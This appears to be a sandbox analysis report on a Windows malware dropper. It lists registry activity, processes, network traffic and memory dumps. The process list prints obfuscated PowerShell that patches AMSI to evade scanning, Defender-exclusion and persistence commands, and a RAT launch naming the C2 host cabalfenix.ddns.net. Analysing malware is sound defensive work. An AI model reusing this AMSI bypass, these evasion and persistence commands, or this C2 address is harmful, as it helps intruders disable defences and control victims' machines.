| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe
"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'
C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="
C:\Users\Admin\AppData\Local\Temp\$77Install.exe
"C:\Users\Admin\AppData\Local\Temp\$77Install.exe"
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
"C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:WOtmSWFShvRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pfjvFlSDBXsxDi,[Parameter(Position=1)][Type]$CjhdyUjELm)$udbfxqizmVH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+'l'+'e'+'ct'+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'M'+'o'+''+'d'+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+''+[Char](84)+'yp'+[Char](101)+'','C'+'l'+''+'a'+''+'s'+''+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+'e'+[Char](97)+'l'+[Char](101)+''+'d'+''+','+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+',A'+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$udbfxqizmVH.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+'e'+'By'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$pfjvFlSDBXsxDi).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+'M'+'a'+'n'+''+[Char](97)+'ged');$udbfxqizmVH.DefineMethod(''+'I'+'n'+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'Hi'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+'al',$CjhdyUjELm,$pfjvFlSDBXsxDi).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+'M'+'a'+''+[Char](110)+'a'+[Char](103)+'ed');Write-Output $udbfxqizmVH.CreateType();}$OoNMDpxBWibyq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'af'+'e'+''+'O'+''+'o'+''+[Char](78)+''+'M'+''+[Char](68)+''+'p'+''+'x'+''+'B'+'W'+[Char](105)+''+[Char](98)+''+[Char](121)+''+[Char](113)+'');$pSxMtMXrgQCnhN=$OoNMDpxBWibyq.GetMethod('p'+[Char](83)+''+[Char](120)+''+'M'+''+[Char](116)+''+'M'+''+[Char](88)+''+'r'+'g'+'Q'+''+[Char](67)+''+[Char](110)+''+'h'+''+'N'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hwiWSEMWABBejCSBBAf=WOtmSWFShvRL @([String])([IntPtr]);$tebFqUkDLOwRrMToAKFvzU=WOtmSWFShvRL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JlaihCxEFiI=$OoNMDpxBWibyq.GetMethod(''+[Char](71)+'e'+'t'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HkssHkJtViOVNJ=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$JlaihCxEFiI,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$yEmWqtIjIKAKqAVit=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$JlaihCxEFiI,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$raNrStu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HkssHkJtViOVNJ,$hwiWSEMWABBejCSBBAf).Invoke(''+'a'+''+'m'+'s'+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$kijCdUeoZuAnJNFXn=$pSxMtMXrgQCnhN.Invoke($Null,@([Object]$raNrStu,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$bLvdKwpgzr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yEmWqtIjIKAKqAVit,$tebFqUkDLOwRrMToAKFvzU).Invoke($kijCdUeoZuAnJNFXn,[uint32]8,4,[ref]$bLvdKwpgzr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$kijCdUeoZuAnJNFXn,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yEmWqtIjIKAKqAVit,$tebFqUkDLOwRrMToAKFvzU).Invoke($kijCdUeoZuAnJNFXn,[uint32]8,0x20,[ref]$bLvdKwpgzr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
"C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AyQtOnZxLTaz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LCnzyOUSddtaFk,[Parameter(Position=1)][Type]$UakHJczsjl)$qfggMrAoIXv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'e'+'m'+''+[Char](111)+'ry'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+[Char](44)+'Se'+[Char](97)+'l'+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$qfggMrAoIXv.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+'e'+','+[Char](72)+'ide'+[Char](66)+''+[Char](121)+'Sig'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$LCnzyOUSddtaFk).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$qfggMrAoIXv.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'ide'+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+'N'+'ewSl'+'o'+''+'t'+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+'ua'+[Char](108)+'',$UakHJczsjl,$LCnzyOUSddtaFk).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'a'+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $qfggMrAoIXv.CreateType();}$rYVFnUAlTrsWl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+'e'+'m'+''+[Char](46)+'d'+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+'Wi'+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+'e'+[Char](114)+''+[Char](89)+'V'+[Char](70)+''+'n'+''+'U'+''+[Char](65)+''+'l'+''+[Char](84)+''+[Char](114)+''+'s'+'Wl');$uBiOvSuBbnJfpW=$rYVFnUAlTrsWl.GetMethod(''+'u'+''+[Char](66)+''+[Char](105)+''+'O'+''+[Char](118)+''+'S'+'u'+[Char](66)+''+'b'+''+[Char](110)+''+[Char](74)+''+'f'+'p'+[Char](87)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+',S'+[Char](116)+'a'+[Char](116)+''+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BbpOVFUxnorBTkxGvjC=AyQtOnZxLTaz @([String])([IntPtr]);$oZxccsDUJBpjlLKxNJSXyh=AyQtOnZxLTaz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ITjqlmzkwBc=$rYVFnUAlTrsWl.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$wVpgrxmdXxYtdd=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ITjqlmzkwBc,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$AtYTgCLZlVLfKbWiR=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ITjqlmzkwBc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+'o'+''+'t'+'e'+'c'+''+'t'+'')));$ntoRZJq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wVpgrxmdXxYtdd,$BbpOVFUxnorBTkxGvjC).Invoke(''+'a'+'m'+[Char](115)+''+'i'+'.'+[Char](100)+'l'+[Char](108)+'');$hvRSorvhVPjOjqRcZ=$uBiOvSuBbnJfpW.Invoke($Null,@([Object]$ntoRZJq,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$HePbTHHcGC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AtYTgCLZlVLfKbWiR,$oZxccsDUJBpjlLKxNJSXyh).Invoke($hvRSorvhVPjOjqRcZ,[uint32]8,4,[ref]$HePbTHHcGC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hvRSorvhVPjOjqRcZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AtYTgCLZlVLfKbWiR,$oZxccsDUJBpjlLKxNJSXyh).Invoke($hvRSorvhVPjOjqRcZ,[uint32]8,0x20,[ref]$HePbTHHcGC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline"
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
"C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath C:\
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"
C:\ProgramData\$77images.exe
"C:\ProgramData\$77images.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\$77images.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f6ecc4b9-3dd8-44cd-92c1-e74b525bf90c}
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 52.182.141.63:443 | tcp | |
| N/A | 2.18.109.224:443 | tcp | |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 8.8.8.8:53 | cabalfenix.ddns.net | udp |
| N/A | 93.184.221.240:80 | tcp |
Files
memory/5036-132-0x00000000001B0000-0x0000000000A8C000-memory.dmp
memory/5036-133-0x00000000057F0000-0x0000000005D94000-memory.dmp
memory/808-135-0x0000000000000000-mapping.dmp
memory/4924-137-0x00000000051E0000-0x0000000005216000-memory.dmp
memory/3536-136-0x0000000000000000-mapping.dmp
